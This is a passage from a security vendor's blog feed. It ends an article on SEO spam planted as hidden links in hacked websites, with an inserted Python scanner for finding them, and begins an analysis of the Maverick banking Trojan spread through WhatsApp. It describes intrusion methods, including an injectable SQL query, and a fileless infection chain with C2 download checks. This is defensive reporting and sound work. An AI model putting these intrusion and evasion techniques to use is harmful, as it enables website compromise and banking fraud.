  253. <p>To place hidden links, attackers typically exploit website configuration errors and vulnerabilities. This may be a weak or compromised password for an administrator account, plugins or an engine that have not been updated in a long time, poor filtering of user inputs, or security issues on the hosting provider&#8217;s side. Furthermore, attackers may attempt to exploit the human factor, for example, by setting up targeted or mass phishing attacks in the hope of obtaining the website administrator&#8217;s credentials.</p>
  254. <p>Let us examine in detail the various mechanisms through which an attacker gains access to editing a page&#8217;s HTML code.</p>
  255. <ul>
  256. <li><strong>Compromise of the administrator password</strong>. An attacker may guess the password, use phishing to trick the victim into giving it away, or steal it with the help of malware. Furthermore, the password may be found in a database of leaked credentials. Site administrators frequently use simple passwords for control panel protection or, even worse, leave the default password, thereby simplifying the task for the attacker.<br />
  257. After gaining access to the admin panel, the attacker can directly edit the page&#8217;s HTML code or install their own plugins with hidden SEO blocks.</li>
  258. <li><strong>Exploitation of CMS (WordPress, Joomla, Drupal) vulnerabilities</strong>. If the engine or plugins are out of date, attackers use known vulnerabilities (SQL Injection, RCE, or XSS) to gain access to the site&#8217;s code. After that, depending on the level of access gained by exploiting the vulnerability, they can modify template files (header.php, footer.php, index.php, etc.), insert invisible blocks into arbitrary site pages, and so on.<br />
  259. In SQL injection attacks, the hacker injects their malicious SQL code into a database query. Many websites, from news portals to online stores, store their content (text, product descriptions, and news) in a database. If an SQL query, such as
  260. <span id="urvanov-syntax-highlighter-68f254acc2659970557860" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline  crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-e ">SELECT *</span><span class="crayon-h"> </span><span class="crayon-e">FROM </span><span class="crayon-e">posts </span><span class="crayon-e">WHERE </span><span class="crayon-v">id</span><span class="crayon-h"> </span><span class="crayon-o">=</span><span class="crayon-h"> </span><span class="crayon-s">'$id'</span></span></span> allows passing arbitrary data, the attacker can use the
  261. <span id="urvanov-syntax-highlighter-68f254acc265a304808340" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline  crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-sy">$</span><span class="crayon-v">id</span></span></span> field to inject their code. This allows the attacker to change the content of records, for example, by inserting HTML with hidden blocks.<br />
  262. In RCE (remote code execution) attacks, the attacker gains the ability to run their own commands on the server where the website runs. Unlike SQL injections, which are limited to the database, RCE provides almost complete control over the system. For example, it allows the attacker to create or modify site files, upload malicious scripts, and, of course, inject invisible blocks.<br />
  263. In an XSS (cross-site scripting) attack, the attacker injects their JavaScript code directly into the web page by using vulnerable input fields, such as those for comments or search queries. When another user visits this page, the malicious script automatically executes in their browser. Such a script enables the attacker to perform various malicious actions, including stealthily adding a hidden
  264. <span id="urvanov-syntax-highlighter-68f254acc265b122062589" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline  crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-o">&lt;</span><span class="crayon-v">div</span><span class="crayon-o">&gt;</span></span></span> block with invisible links to the page. For XSS, the attacker does not need direct access to the server or database, as in the case with SQL injection or RCE; they only need to find a single vulnerability on the website.</li>
  265. <li><strong>An attack via the hosting provider</strong>. In addition to directly hacking the target website, an attacker may attempt to gain access to the website through the hosting environment. If the hosting provider&#8217;s server is poorly secured, there is a risk of it being compromised. Furthermore, if multiple websites or web applications run on the same server, a vulnerability in one of them can jeopardize all other projects. The attacker&#8217;s capabilities depend on the level of access to the server. These capabilities may include: injecting hidden blocks into page templates, substituting files, modifying databases, connecting external scripts to multiple websites simultaneously, and so forth. Meanwhile, the website administrator may not notice the problem because the vulnerability is being exploited within the server environment rather than the website code.</li>
  266. </ul>
  267. <p>Note that the appearance of hidden links on a website is not always a sign of a cyberattack. The issue often arises during the development phase, for example, if an illegal copy of a template is downloaded to save money or if the project is executed by an unscrupulous web developer.</p>
  268. <h2 id="why-attackers-place-hidden-blocks-on-websites">Why attackers place hidden blocks on websites</h2>
  269. <p>One of the most obvious goals for injecting hidden blocks into other people&#8217;s websites is to steal the PageRank from the victim. The more popular and authoritative the website is, the more interesting it is to attackers. However, this does not mean that moderate- or low-traffic websites are safe. As a rule, administrators of popular websites and large platforms do their best to adhere to security rules, so it is not so easy to get close to them. Therefore, attackers may target less popular – and less protected – websites.</p>
  270. <p>As previously mentioned, this approach to promoting websites is easily detected and blocked by search engines. In the short term, though, attackers still benefit from this: they manage to drive traffic to the websites that interest them until search engine algorithms detect the violation.</p>
  271. <p>Even though the user does not see the hidden block and cannot click the links, attackers can use scripts to boost traffic to their websites. One possible scenario involves JavaScript creating an iframe in the background or sending an HTTP request to the website from the hidden block, which then receives information about the visit.</p>
  272. <p>Hidden links can lead not just to pornographic or other questionable websites but also to websites with low-quality content whose sole purpose is to be promoted and subsequently sold, or to phishing and malicious websites. In more sophisticated schemes, the script that provides &#8220;visits&#8221; to such websites may load malicious code into the victim&#8217;s browser.</p>
  273. <p>Finally, hidden links allow attackers to lower the reputation of the targeted website and harm its standing with search engines. This threat is especially relevant in light of the fact that algorithms such as Google Penguin penalize websites hosting questionable links. Attackers may use these techniques as a tool for unfair competition, hacktivism, or any other activity that involves discrediting certain organizations or individuals.</p>
  274. <p>Interestingly, in 2025, we have more frequently encountered hidden blocks with links to pornographic websites and online casinos on various legitimate websites. With low confidence, we can suggest that this is partly due to the development of neural networks, which make it easy to automate such attacks, and partly due to the regular <a href="https://developers.google.com/search/docs/appearance/spam-updates" target="_blank" rel="noopener">updates to Google&#8217;s anti-spam systems</a>, the latest of which was completed at the end of September 2025: attackers may have rushed to maximize their gains before the search engine made it a little harder for them.</p>
  275. <h2 id="consequences-for-the-victim-website">Consequences for the victim website</h2>
  276. <p>The consequences for the victim website can vary in severity. At a minimum, the presence of hidden links placed by unauthorized parties hurts search engine reputation, which may lead to lower search rankings or even complete exclusion from search results. However, even without any penalties, the links disrupt the internal linking structure because they lead to external websites and pass on a portion of the victim&#8217;s weight to them. This negatively impacts the rankings of key pages.</p>
  277. <p>Although unseen by visitors, hidden links can be discovered by external auditors, content analysis systems, or researchers who report such findings in public reports. This is something that can undermine trust in the website. For example, sites where our categorization engine detects links to pornography pages will be classified as &#8220;Adult content&#8221;. Consequently, all of our clients who use web filters to block this category will be unable to visit the website. Furthermore, information about a website&#8217;s category is published on our <a href="https://opentip.kaspersky.com/" target="_blank" rel="noopener">Kaspersky Threat Intelligence Portal</a> and available to anyone wishing to look up its reputation.</p>
  278. <p>If the website is being used to distribute illegal or fraudulent content, the issue enters the legal realm, with the owner potentially facing lawsuits from copyright holders or regulators. For example, if the links lead to websites that distribute pirated content, the site may be considered an intermediary in copyright infringement. If the hidden block contains malicious scripts or automatic redirects to questionable websites, such as phishing pages, the owner can be charged with fraud or some other cybercrime.</p>
  279. <h2 id="how-to-detect-a-hidden-link-block-on-your-website">How to detect a hidden link block on your website</h2>
  280. <p>The simplest and most accessible method for any user to check a website for a hidden block is to view its source code in the browser. This is very easy to do. Navigate to the website, press Control+U, and the website&#8217;s code will open in a new tab. Search (Control+F) the code for the following keywords:
  281. <code>display: none</code>, <code>visibility: hidden</code>, <code>opacity: 0</code>, <code>height: 0</code>, <code>width: 0</code>, <code>position: absolute</code>. In addition, you can check for keywords that are characteristic of the hidden content itself. When it comes to links that point to adult or gambling sites, you should look for
  282. <code>porn</code>, <code>sex</code>, <code>casino</code>, <code>card</code>, and the like.</p>
  283. <p>A slightly more complex method is using web developer tools to investigate the DOM for invisible blocks. After the page fully loads, open DevTools (F12) in the browser and go to the Elements tab. Search (Control+F) for keywords such as
  284. <code>&lt;a</code>, <code>iframe</code>, <code>display: none</code>, <code>hidden</code>, <code>opacity</code>. Hover your cursor over suspicious elements in the code so the browser highlights their location on the page. If the block occupies zero area or is located outside the visible area, that is an indicator of a hidden element. Check the Computed tab for the selected element; there, you can see the applied CSS styles and confirm that it is hidden from the user&#8217;s view.</p>
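<p>The two checks above (keyword search in the source and inspection of the DOM for hidden containers) can be scripted for an offline audit of a saved page. The following is an added example, not code from the original article or from Kaspersky; the page markup, the host name bakery.example and the hiding patterns are constructed assumptions.</p>

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Inline-style patterns that hide an element and everything nested in it: the
# keywords the text says to search for, as regexes so "display : none" matches too.
HIDDEN_STYLE_PATTERNS = {
    "display:none": re.compile(r"display\s*:\s*none", re.I),
    "visibility:hidden": re.compile(r"visibility\s*:\s*hidden", re.I),
    "opacity:0": re.compile(r"opacity\s*:\s*0(?:\.0+)?(?![\d.])", re.I),
    # the lookbehind keeps "line-height:0" from tripping the height check
    "height:0": re.compile(r"(?<![\w-])height\s*:\s*0(?:px|em|%)?\s*(?:;|!|$)", re.I),
    "width:0": re.compile(r"(?<![\w-])width\s*:\s*0(?:px|em|%)?\s*(?:;|!|$)", re.I),
    # position:absolute alone is not hiding; a large negative offset is
    "off-screen": re.compile(r"(?:left|top)\s*:\s*-\d{3,}", re.I),
}
SUSPICIOUS_WORDS = ("porn", "sex", "casino", "card")
# Elements without a closing tag must not linger on the open-element stack.
VOID_TAGS = {"area", "base", "br", "col", "embed", "hr", "img", "input",
             "link", "meta", "source", "track", "wbr"}


class HiddenLinkScanner(HTMLParser):
    """Tracks which open elements are hidden and records every <a href> or
    <iframe src> that sits inside a hidden container."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.stack = []       # (tag, own hidden reason or None) per open element
        self.findings = []
        self._anchor = None   # the <a> whose text is currently being collected

    @staticmethod
    def _hidden_reason(attrs):
        if "hidden" in attrs:                  # HTML5 boolean attribute
            return "hidden attribute"
        style = attrs.get("style") or ""
        return next((r for r, p in HIDDEN_STYLE_PATTERNS.items() if p.search(style)), None)

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        own = self._hidden_reason(attrs)
        hidden = own or next((r for _t, r in reversed(self.stack) if r), None)
        if tag not in VOID_TAGS:
            self.stack.append((tag, own))
        if tag == "a" and attrs.get("href"):
            self._anchor = {"tag": "a", "target": attrs["href"], "hidden": hidden, "text": ""}
        elif tag == "iframe" and attrs.get("src"):
            self._record({"tag": "iframe", "target": attrs["src"], "hidden": hidden, "text": ""})

    def handle_data(self, data):
        if self._anchor is not None:
            self._anchor["text"] += data

    def handle_endtag(self, tag):
        if tag == "a" and self._anchor is not None:
            self._record(self._anchor)
            self._anchor = None
        for i in range(len(self.stack) - 1, -1, -1):   # pop back to the matching open tag
            if self.stack[i][0] == tag:
                del self.stack[i:]
                break

    def _record(self, item):
        if not item["hidden"]:
            return                              # visible links are ordinary content
        host = (urlparse(item["target"]).hostname or "").lower()
        item["external"] = bool(host) and host != self.page_host
        haystack = (item["target"] + " " + item["text"]).lower()
        item["keywords"] = [w for w in SUSPICIOUS_WORDS if w in haystack]
        self.findings.append(item)


def scan_html(html, page_host):
    """Hidden <a>/<iframe> elements in `html`, in document order."""
    scanner = HiddenLinkScanner(page_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed page for a fictitious site (bakery.example) with planted blocks.
SAMPLE_PAGE = """<!doctype html><html><body>
<p>Welcome to <a href="/menu">our menu</a> and <a href="https://maps.example.com/b">map</a>.</p>
<div style="position:absolute; left:-9999px">
  <a href="https://best-casino-bonus.example/">online casino bonus</a>
  <a href="https://adult-site.example/xxx">free porn</a>
</div>
<div style="display:none"><iframe src="https://tracker.example/visit"></iframe></div>
<span hidden><a href="https://pills.example/buy">cheap pills</a></span>
<p style="opacity:1"><a href="https://partner.example/">visible partner</a></p>
<footer style="line-height:0"><a href="/about">about</a></footer>
</body></html>"""

if __name__ == "__main__":
    for f in scan_html(SAMPLE_PAGE, "bakery.example"):
        print(f"{f['tag']:6} {f['hidden']:17} external={f['external']!s:5} "
              f"kw={','.join(f['keywords']) or '-':7} {f['target']}")
```

<p>Run it against a page saved with Control+U; links reported as hidden and external, especially with a keyword hit, are the candidates to inspect in DevTools.</p>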
  285. <p>You can also utilize specialized SEO tools. These are typically third-party solutions that scan website SEO data and generate reports. They can provide a report about suspicious links as well. Few of them are free, but when selecting a tool, you should be guided primarily by the vendor&#8217;s reputation rather than price. It is better to use tried-and-true, well-known services that are known to be free of malicious or questionable payloads. Examples of these trusted services include Google Search Console, Bing Webmaster Tools, OpenLinkProfiler, and SEO Minion.</p>
  286. <p>Another way to discover hidden SEO spam on a website is to check the CMS itself and its files. First, you should scan the database tables for suspicious HTML tags with third-party links that may have been inserted by attackers, and also carefully examine the website&#8217;s template files (header.php, footer.php, and index.php) and included modules for unfamiliar or suspicious code. Pay particular attention to encrypted insertions, unclear scripts, or links that should not originally be present in the website&#8217;s structure.</p>
  287. <p>Additionally, you can look up your website&#8217;s reputation on the <a href="https://opentip.kaspersky.com/" target="_blank" rel="noopener">Kaspersky Threat Intelligence Portal</a>. If you find it in an uncharacteristic category – typically &#8220;Adult content&#8221;, &#8220;Sexually explicit&#8221;, or &#8220;Gambling&#8221; – there is a high probability that there is a hidden SEO spam block embedded in your website.</p>
  288. <h2 id="how-to-protect-your-website">How to protect your website</h2>
  289. <p>To prevent hidden links from appearing on your website, avoid unlicensed templates, themes, and other pre-packaged solutions. The entire site infrastructure must be built only on licensed and official solutions. The same principle applies to webmasters and companies you hire to build your website: we recommend checking their work for hidden links, but also for vulnerabilities in general. Never cut corners when it comes to security.</p>
  290. <p>Keep your CMS, themes, and plugins up to date, as new versions often patch known vulnerabilities that attackers can exploit. Delete any unused plugins and themes. The fewer unnecessary components are installed, the lower the risk of an exploit in one of the extensions, plugins, or themes. It is worth noting that this risk never disappears completely – it is still there even with a minimal set of components, as long as they are outdated or poorly secured.</p>
  291. <p>To protect files and the server, it is important to properly configure access permissions. On servers running Linux and other Unix-like systems, use <strong>644</strong> for files and <strong>755</strong> for folders. This means that the owner can open folders, and read and modify folders and files, while the group and other users can only read files and open folders. If write access is not necessary, for example in template folders, forbid it altogether to lower the risk of malicious actors making unauthorized changes. Furthermore, you must set up regular, automatic website backups so that data can be quickly restored if there is an issue.</p>
  292. <p>Additionally, it is worth using web application firewalls (WAFs), which help block malicious requests and protect the site from external attacks. This solution is available in <a href="https://www.kaspersky.com/small-to-medium-business-security/ddos-protection?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team___kddosp____debce7fd29f69a6d" target="_blank" rel="noopener">Kaspersky DDoS Protection</a>.</p>
  293. <p>To protect the administrator panel, use only strong passwords and 2FA (Two-Factor Authentication) at all times. You would be well-advised to restrict access to the admin panel by IP address if you can. Only a limited group of individuals should be granted admin privileges.</p>
  294. ]]></content:encoded>
  295. <wfw:commentRss>https://securelist.com/seo-spam-hidden-links/117782/feed/</wfw:commentRss>
  296. <slash:comments>0</slash:comments>
  297. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16210132/SL-seo-spam-featured.jpg" width="2000" height="1000"><media:keywords>full</media:keywords></media:content>
  298. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16210132/SL-seo-spam-featured-1024x512.jpg" width="1024" height="512"><media:keywords>large</media:keywords></media:content>
  299. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16210132/SL-seo-spam-featured-300x150.jpg" width="300" height="150"><media:keywords>medium</media:keywords></media:content>
  300. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16210132/SL-seo-spam-featured-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  301. </item>
  302. <item>
  303. <title>Maverick: a new banking Trojan abusing WhatsApp in a mass-scale distribution</title>
  304. <link>https://securelist.com/maverick-banker-distributing-via-whatsapp/117715/</link>
  305. <comments>https://securelist.com/maverick-banker-distributing-via-whatsapp/117715/#respond</comments>
  306. <dc:creator><![CDATA[GReAT]]></dc:creator>
  307. <pubDate>Wed, 15 Oct 2025 13:00:43 +0000</pubDate>
  308. <category><![CDATA[Malware descriptions]]></category>
  309. <category><![CDATA[Malware Technologies]]></category>
  310. <category><![CDATA[Microsoft Internet Explorer]]></category>
  311. <category><![CDATA[Firefox]]></category>
  312. <category><![CDATA[Google Chrome]]></category>
  313. <category><![CDATA[Malware Descriptions]]></category>
  314. <category><![CDATA[Malware]]></category>
  315. <category><![CDATA[Trojan Banker]]></category>
  316. <category><![CDATA[Trojan]]></category>
  317. <category><![CDATA[Brazil]]></category>
  318. <category><![CDATA[Microsoft Edge]]></category>
  319. <category><![CDATA[Coyote]]></category>
  320. <category><![CDATA[Maverick]]></category>
  321. <category><![CDATA[Financial threats]]></category>
  322. <category><![CDATA[Windows malware]]></category>
  323. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=117715</guid>
  324.  
  325. <description><![CDATA[A malware campaign was recently detected in Brazil, distributing a malicious LNK file using WhatsApp. It delivered a new Maverick banker, which features code overlaps with Coyote malware.]]></description>
  326. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15073641/SL-Maverick-Brazilian-banker-featured-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>A malware campaign was recently detected in Brazil, distributing a malicious LNK file using WhatsApp. It targets mainly Brazilians and uses Portuguese-named URLs. To evade detection, the command-and-control (C2) server verifies each download to ensure it originates from the malware itself.<br />
  327. The whole infection chain is complex and fully fileless, and by the end, it will deliver a new banking Trojan named Maverick, which contains many code overlaps with <a href="https://securelist.com/coyote-multi-stage-banking-trojan/111846/" target="_blank" rel="noopener">Coyote</a>. In this blog post, we detail the entire infection chain, encryption algorithm, and its targets, as well as discuss the similarities with known threats.</p>
  328. <h2 id="key-findings">Key findings:</h2>
  329. <ul>
  330. <li>A massive campaign disseminated through WhatsApp distributed the new Brazilian banking Trojan named &#8220;Maverick&#8221; through ZIP files containing a malicious LNK file, which is not blocked on the messaging platform.</li>
  331. <li>Once installed, the Trojan uses the open-source project WPPConnect to automate the sending of messages in hijacked accounts via WhatsApp Web, taking advantage of the access to send the malicious message to contacts.</li>
  332. <li>The new Trojan features code similarities with another Brazilian banking Trojan called <a href="https://securelist.com/coyote-multi-stage-banking-trojan/111846/" target="_blank" rel="noopener">Coyote</a>; however, we consider Maverick to be a new threat.</li>
  333. <li>The Maverick Trojan checks the time zone, language, region, and date and time format on infected machines to ensure the victim is in Brazil; otherwise, the malware will not be installed.</li>
  334. <li>The banking Trojan can fully control the infected computer, taking screenshots, monitoring open browsers and websites, installing a keylogger, controlling the mouse, blocking the screen when accessing a banking website, terminating processes, and opening phishing pages in an overlay. It aims to capture banking credentials.</li>
  335. <li>Once active, the new Trojan will monitor the victims&#8217; access to 26 Brazilian bank websites, 6 cryptocurrency exchange websites, and 1 payment platform.</li>
  336. <li>All infections are modular and performed in memory, with minimal disk activity, using PowerShell, .NET, and shellcode encrypted using Donut.</li>
  337. <li>The new Trojan uses AI in the code-writing process, especially in certificate decryption and general code development.</li>
  338. <li>Our solutions blocked 62 thousand infection attempts involving the malicious LNK file in the first 10 days of October in Brazil alone.</li>
  339. </ul>
  340. <h2 id="initial-infection-vector">Initial infection vector</h2>
  341. <p>The infection chain works according to the diagram below:</p>
  342. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15061851/maverick-banker-01.png" class="magnificImage"><img loading="lazy" decoding="async" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15061851/maverick-banker-01.png" alt="" width="2093" height="731" class="aligncenter size-full wp-image-117756" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15061851/maverick-banker-01.png 2093w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15061851/maverick-banker-01-300x105.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15061851/maverick-banker-01-1024x358.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15061851/maverick-banker-01-768x268.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15061851/maverick-banker-01-1536x536.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15061851/maverick-banker-01-2048x715.png 2048w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15061851/maverick-banker-01-1002x350.png 1002w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15061851/maverick-banker-01-740x258.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15061851/maverick-banker-01-802x280.png 802w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15061851/maverick-banker-01-800x279.png 800w" sizes="auto, (max-width: 2093px) 100vw, 2093px" /></a></p>
  343. <p>The infection begins when the victim receives a malicious .LNK file inside a ZIP archive via a WhatsApp message. The filename can be generic, or it can pretend to be from a bank:</p>
  344. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15061954/maverick-banker-02-upd.jpg" class="magnificImage"><img loading="lazy" decoding="async" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15061954/maverick-banker-02-upd.jpg" alt="" width="1009" height="546" class="aligncenter size-full wp-image-117757" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15061954/maverick-banker-02-upd.jpg 1009w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15061954/maverick-banker-02-upd-300x162.jpg 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15061954/maverick-banker-02-upd-768x416.jpg 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15061954/maverick-banker-02-upd-647x350.jpg 647w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15061954/maverick-banker-02-upd-740x400.jpg 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15061954/maverick-banker-02-upd-517x280.jpg 517w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15061954/maverick-banker-02-upd-800x433.jpg 800w" sizes="auto, (max-width: 1009px) 100vw, 1009px" /></a></p>
  345. <p>The message said, <em>&#8220;Visualization allowed only in computers. In case you&#8217;re using the Chrome browser, choose &#8220;keep file&#8221; because it&#8217;s a zipped file&#8221;.</em></p>
  346. <p>The LNK is encoded to execute cmd.exe with the following arguments:</p>
  347. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212230/maverick-banker-distributing5.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-117718" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212230/maverick-banker-distributing5.png" alt="" width="2048" height="111" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212230/maverick-banker-distributing5.png 2048w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212230/maverick-banker-distributing5-300x16.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212230/maverick-banker-distributing5-1024x56.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212230/maverick-banker-distributing5-768x42.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212230/maverick-banker-distributing5-1536x83.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212230/maverick-banker-distributing5-740x40.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212230/maverick-banker-distributing5-1600x87.png 1600w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212230/maverick-banker-distributing5-800x43.png 800w" sizes="auto, (max-width: 2048px) 100vw, 2048px" /></a></p>
  348. <p>The decoded commands point to the execution of a PowerShell script:</p>
  349. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212353/maverick-banker-distributing1-1.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-117720" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212353/maverick-banker-distributing1-1.png" alt="" width="1633" height="39" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212353/maverick-banker-distributing1-1.png 1633w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212353/maverick-banker-distributing1-1-300x7.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212353/maverick-banker-distributing1-1-1024x24.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212353/maverick-banker-distributing1-1-768x18.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212353/maverick-banker-distributing1-1-1536x37.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212353/maverick-banker-distributing1-1-740x18.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212353/maverick-banker-distributing1-1-1600x38.png 1600w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212353/maverick-banker-distributing1-1-800x19.png 800w" sizes="auto, (max-width: 1633px) 100vw, 1633px" /></a></p>
  350. <p>The command will contact the C2 to download another PowerShell script. It is important to note that the C2 also validates the &#8220;User-Agent&#8221; of the HTTP request to ensure that it is coming from the PowerShell command. This is why, without the correct &#8220;User-Agent&#8221;, the C2 returns an HTTP 401 code.</p>
  351. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062044/maverick-banker-distributing7-upd.png" class="magnificImage"><img loading="lazy" decoding="async" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062044/maverick-banker-distributing7-upd.png" alt="" width="1615" height="883" class="aligncenter size-full wp-image-117758" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062044/maverick-banker-distributing7-upd.png 1615w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062044/maverick-banker-distributing7-upd-300x164.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062044/maverick-banker-distributing7-upd-1024x560.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062044/maverick-banker-distributing7-upd-768x420.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062044/maverick-banker-distributing7-upd-1536x840.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062044/maverick-banker-distributing7-upd-640x350.png 640w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062044/maverick-banker-distributing7-upd-740x405.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062044/maverick-banker-distributing7-upd-512x280.png 512w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062044/maverick-banker-distributing7-upd-800x437.png 800w" sizes="auto, (max-width: 1615px) 100vw, 1615px" /></a></p>
  352. <p>The entry script is used to decode an embedded .NET file, and all of this occurs only in memory. The .NET file is decoded by dividing each byte by a specific value; in the script above, the value is &#8220;174&#8221;. The PE file is decoded and is then loaded as a .NET assembly within the PowerShell process, making the entire infection fileless, that is, without files on disk.<br />
  353. <a name="loader"></a></p>
  354. <h3 id="initial-net-loader">Initial .NET loader</h3>
  355. <p>The initial .NET loader is heavily obfuscated using Control Flow Flattening and indirect function calls, storing them in a large vector of functions and calling them from there. In addition to obfuscation, it also uses random method and variable names to hinder analysis. Nevertheless, after our analysis, we were able to reconstruct (to a certain extent) its main flow, which consists of downloading and decrypting two payloads.</p>
